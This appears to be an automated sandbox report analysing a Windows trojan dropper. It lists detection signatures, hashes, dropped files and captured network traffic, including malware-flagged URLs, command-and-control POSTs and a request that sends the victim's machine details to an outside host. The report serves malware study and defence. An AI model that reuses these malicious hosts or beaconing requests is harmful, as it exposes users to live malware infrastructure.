Windows Analysis Report 1nJGU59JPU

Overview

General Information

Sample Name: 1nJGU59JPU (renamed file extension from none to exe)
Analysis ID: 553343
MD5: aea21ab88cca720a34ec1c9c4794f82a
SHA1: 5241d6fd4013ec8251df46e231665471a8ca70db
SHA256: 498421bc4c78ba9bf7c9d669bd9958cf2c0c1cc89e94288800fe004400821ef3
Tags: 32, exe, trojan
Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Performs DNS queries to domains with low reputation
Connects to many IPs within the same subnet mask (likely port scanning)
Drops executable to a common third party application directory
.NET source code contains method to dynamically call methods (often used by packers)
Obfuscated command line found
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Connects to many different domains
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

AV Detection:

Antivirus detection for URL or domain
Source: http://vexacion.com/afu.php?zoneid=1851513 Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1492888&syncedCookie=true Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483leSystem Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1851513&syncedCookie=false Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483z Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1343177&var=3 Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1851483&syncedCookie=false Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1294231&syncedCookie=false Avira URL Cloud: Label: malware
Source: http://vexacion.com/afu.php?zoneid=1851483C: Avira URL Cloud: Label: malware
Source: http://vexacion.com/?z=1339680&syncedCookie=false Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Avira: detection malicious, Label: TR/Dldr.Agent.pwjwe
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Avira: detection malicious, Label: HEUR/AGEN.1139393
Multi AV Scanner detection for submitted file
Source: 1nJGU59JPU.exe Virustotal: Detection: 25%
Source: 1nJGU59JPU.exe Metadefender: Detection: 31%
Source: 1nJGU59JPU.exe ReversingLabs: Detection: 57%
Antivirus / Scanner detection for submitted sample
Source: 1nJGU59JPU.exe Avira: detected
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Metadefender: Detection: 20%
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe ReversingLabs: Detection: 78%
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Metadefender: Detection: 34%
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe ReversingLabs: Detection: 77%
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.1.1nJGU59JPU.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.1nJGU59JPU.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.0.1nJGU59JPU.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49754 version: TLS 1.0
Source: unknown HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49764 version: TLS 1.0
Source: unknown HTTPS traffic detected: 51.159.62.6:443 -> 192.168.2.3:49768 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50077 version: TLS 1.0
Source: unknown HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:50416 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50854 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50856 version: TLS 1.0
Uses 32bit PE files
Source: 1nJGU59JPU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.82.210.154:443 -> 192.168.2.3:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50362 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.148.61:443 -> 192.168.2.3:50399 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50398 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.85:443 -> 192.168.2.3:50646 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.143.225:443 -> 192.168.2.3:50851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.164.165:443 -> 192.168.2.3:50853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.33.188:443 -> 192.168.2.3:50879 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.71.70:443 -> 192.168.2.3:50883 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.74.240:443 -> 192.168.2.3:50884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.133.243:443 -> 192.168.2.3:50889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:50919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.143.210:443 -> 192.168.2.3:50920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.199.120.151:443 -> 192.168.2.3:50930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.5.229:443 -> 192.168.2.3:50933 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.27.252:443 -> 192.168.2.3:50935 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Directory created: C:\Program Files\internet explorer\ROOKKLCFJB
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Directory created: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe.config
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic
Source: 1nJGU59JPU.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: updater.pdbh source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source: Binary string: Publisher.pdbX source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb4 source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\widgets\I-record\JetScreenRecorder\obj\Release\I-Record.pdb` source: I-Record.exe, 00000016.00000000.346453138.00000000007CA000.00000002.00020000.sdmp
Source: Binary string: Recover.pdbh> source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb,"nbreDay": source: 7((_8888YTR(.exe, 00000003.00000002.324111810.0000000002E1A000.00000004.00000001.sdmp
Source: Binary string: Recover.pdb source: ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source: Binary string: I-Record.pdb8 source: 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source: Binary string: updater.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp
Source: Binary string: \\Mac\Home\Documents\Workspace\Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000003.311892034.0000000012EB6000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp, 7((_8888YTR(.exe, 00000003.00000002.324331336.0000000012C05000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.331817003.000000001B560000.00000004.00020000.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp, Kixysyshysy.exe, 0000000A.00000000.306274284.0000000000EF2000.00000002.00020000.sdmp, ZHunuhebaqu.exe, 00000014.00000002.371539606.0000000012B7D000.00000004.00000001.sdmp, ZHunuhebaqu.exe, 00000014.00000002.369602756.0000000012A9D000.00000004.00000001.sdmp, Windows Update.exe
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdbF source: 7((_8888YTR(.exe, 00000003.00000002.324177929.0000000002E4A000.00000004.00000001.sdmp
Source: Binary string: I-Record.pdb source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp
Source: Binary string: C:\Users\DoomsDark\Desktop\bundle\products\Net 3.5\NEwTONSOFTJSON\HandlerExecution\HandlerExecution\obj\Release\Handler.pdb source: ZHunuhebaqu.exe, ZHunuhebaqu.exe, 00000014.00000002.361743821.0000000000512000.00000002.00020000.sdmp
Source: Binary string: e:\mydev\inno-download-plugin\ansi\idp.pdb source: 1nJGU59JPU.tmp, 00000001.00000002.336506814.000000000018F000.00000004.00000001.sdmp
Source: Binary string: Publisher.pdb source: 7((_8888YTR(.exe, 00000003.00000003.311615381.0000000012D46000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000003.311490993.0000000012C87000.00000004.00000001.sdmp, Vahutuqeke.exe, 00000009.00000000.301759774.00000000000F2000.00000002.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00452AD4 FindFirstFileA,GetLastError, 1_2_00452AD4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_0046417C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0046417C
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_004645F8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_004645F8
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00462BF0 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462BF0
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00498FDC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_00498FDC
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00475798 FindFirstFileA,FindNextFileA,FindClose, 1_2_00475798

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2032327 ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2 192.168.2.3:49778 -> 139.45.197.236:80
Source: Traffic Snort IDS: 2032327 ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2 192.168.2.3:49776 -> 139.45.197.236:80
Source: Traffic Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:57236 -> 34.64.183.91:53
Performs DNS queries to domains with low reputation
Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: www.cloud-security.xyz
Connects to many IPs within the same subnet mask (likely port scanning)
Source: global traffic TCP traffic: Count: 16 IPs: 13.224.96.29,13.224.96.28,13.224.96.4,13.224.96.6,13.224.96.30,13.224.96.122,13.224.96.86,13.224.96.58,13.224.96.15,13.224.96.45,13.224.96.106,13.224.96.80,13.224.96.124,13.224.96.72,13.224.96.103,13.224.96.84
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 136Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SaveData/SaveData.php?ezzabour=%7B%22NameOffer%22:%22Acrons%22,%22ip%22:%22%22,%22country%22:%22CH%22,%22DateTime%22:%222022/01/14%2018:01%22,%22Device%22:%22835180%22,%22PCName%22:%22user%22,%22postcheck%22:%22False%22,%22tag%22:%22kenpachi2_lyla7_lylach7_irecord_goodchannel_registry_goodchannel_AdxpertMedia_Acrons%22,%22Os%22:%22WIN10%22,%22Browser%22:%22Chrome%22%7D HTTP/1.1Host: htagzdownload.pwConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 180Expect: 100-continueAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 264Expect: 100-continueAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Source: global traffic HTTP traffic detected: POST /jkzhnzhedxagwdqp/suybdffapqeffezs HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 360devtracking.comContent-Length: 224Expect: 100-continueAccept-Encoding: gzip
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKContent-Length: 571904x-amz-id-2: txa1eb6ccc970d468cbdbb0-0061e1abdaAccept-Ranges: bytesLast-Modified: Mon, 10 Jan 2022 12:30:09 GMTETag: "f97d18bae067594234dc3ea8e06d10a1"x-amz-request-id: txa1eb6ccc970d468cbdbb0-0061e1abdax-amz-version-id: 1641817806697520Content-Type: application/octet-streamDate: Fri, 14 Jan 2022 16:59:06 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8e 7b 52 fc 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 07 00 00 40 01 00 00 00 00 00 5e 94 07 00 00 20 00 00 00 a0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 10 94 07 00 4b 00 00 00 00 c0 07 00 54 39 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 0c 00 00 00 cb 93 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 74 07 00 00 20 00 00 00 76 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f8 02 00 00 00 a0 07 00 00 04 00 00 00 7a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 54 39 01 00 00 c0 07 00 00 3a 01 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 09 00 00 02 00 00 00 b8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49754 version: TLS 1.0
Source: unknown HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:49755 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49760 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:49764 version: TLS 1.0
Source: unknown HTTPS traffic detected: 51.159.62.6:443 -> 192.168.2.3:49768 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50077 version: TLS 1.0
Source: unknown HTTPS traffic detected: 163.172.208.8:443 -> 192.168.2.3:50416 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50854 version: TLS 1.0
Source: unknown HTTPS traffic detected: 162.0.210.44:443 -> 192.168.2.3:50856 version: TLS 1.0
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 102
Detected TCP or UDP traffic on non-standard ports
Source: global traffic UDP traffic: 192.168.2.3:60138 -> 142.250.154.127:19302
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 11
Source: 7((_8888YTR(.exe, 00000003.00000002.323750858.0000000002C9C000.00000004.00000001.sdmp String found in binary or memory: http://360devtracking.com
Source: 7((_8888YTR(.exe, 00000003.00000002.323919834.0000000002D62000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp String found in binary or memory: http://360devtracking.com/jkzhnzhedxagwdqp/suybdffapqeffezs
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp String found in binary or memory: http://accounts.google.com/
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp String found in binary or memory: http://accounts.google.com/r
Source: chrome.exe, 00000017.00000003.372345068.000001AC63EC6000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.380018041.000001AC60655000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390793589.000001AC60656000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396124354.0000018BEE694000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404252936.0000018BEE698000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400658455.0000018BEE697000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe-
Source: chrome.exe, 00000017.00000002.403234818.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.387763712.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.393863059.0000018BF1F07000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414108310.0000018BF1F07000.00000004.00000001.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000017.00000002.403234818.000001AC63EA4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.387763712.000001AC63EA4000.00000004.00000001.sdmp String found in binary or memory: http://clients2.google.com/time/1/currentL
Source: 7((_8888YTR(.exe, 7((_8888YTR(.exe, 00000003.00000002.322784031.0000000000602000.00000002.00020000.sdmp String found in binary or memory: http://cor-tips.com/Download/corTips.exe
